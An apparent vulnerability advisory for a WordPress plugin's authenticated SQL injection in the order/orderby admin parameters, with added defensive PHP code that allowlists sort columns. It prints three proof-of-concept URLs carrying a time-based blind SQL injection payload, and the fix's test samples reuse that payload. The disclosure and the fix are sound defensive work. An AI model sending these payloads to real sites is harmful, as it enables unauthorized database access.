The plugin did not validate or escape the order and orderby GET parameters in some of its admin dashboard pages, leading to authenticated SQL injections.
https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page&orderby=1+AND+%28SELECT+4242+FROM+%28SELECT%28SLEEP%285%29%29%29aaa%29&order=asc
https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page2&orderby=1+AND+%28SELECT+4242+FROM+%28SELECT%28SLEEP%285%29%29%29aaa%29&order=asc
https://example.com/wp-admin/admin.php?page=sbb_my-custom-submenu-page3&orderby=1+AND+%28SELECT+4242+FROM+%28SELECT%28SLEEP%285%29%29%29aaa%29&order=asc
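A column name or sort direction cannot be bound as a prepared-statement value, so the usual fix for this class of bug is to map order and orderby onto an allowlist before they reach the query. The following is an added example, not the plugin's code; the function name, constants and column names are assumptions.

```php
<?php
// Added example: allowlist-based ORDER BY builder for list-table sorting.
// SORTABLE_COLUMNS, DEFAULT_COLUMN and build_order_clause() are hypothetical
// names; the plugin's real schema is not shown in the advisory.

const SORTABLE_COLUMNS = ['id', 'name', 'created_at'];
const DEFAULT_COLUMN   = 'id';

/**
 * Build an ORDER BY clause from request parameters.
 * Only exact matches from the allowlist are ever placed in the SQL text;
 * anything else falls back to a fixed default.
 */
function build_order_clause(array $query): string
{
    $orderby = $query['orderby'] ?? DEFAULT_COLUMN;
    $order   = $query['order'] ?? 'asc';

    // Reject non-strings (e.g. orderby[]=x) and any value not in the list.
    // Strict comparison avoids PHP type juggling on values such as "0".
    if (!is_string($orderby) || !in_array($orderby, SORTABLE_COLUMNS, true)) {
        $orderby = DEFAULT_COLUMN;
    }

    // The direction is reduced to one of two literals, never echoed back.
    $direction = (is_string($order) && strtolower($order) === 'desc')
        ? 'DESC'
        : 'ASC';

    return sprintf('ORDER BY `%s` %s', $orderby, $direction);
}

// Constructed inputs: a legitimate sort, the advisory's orderby value
// (URL-decoded), an array parameter, and an invalid direction.
$samples = [
    ['orderby' => 'name', 'order' => 'desc'],
    ['orderby' => '1 AND (SELECT 4242 FROM (SELECT(SLEEP(5)))aaa)', 'order' => 'asc'],
    ['orderby' => ['name'], 'order' => 'asc'],
    ['orderby' => 'created_at', 'order' => 'asc; DROP'],
];

foreach ($samples as $sample) {
    echo json_encode($sample), ' => ', build_order_clause($sample), PHP_EOL;
}
```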
Martin Vierula of Trustwave
Yes
2021-08-06 (about 10 months ago)
2021-08-09 (about 10 months ago)
2022-04-24 (about 2 months ago)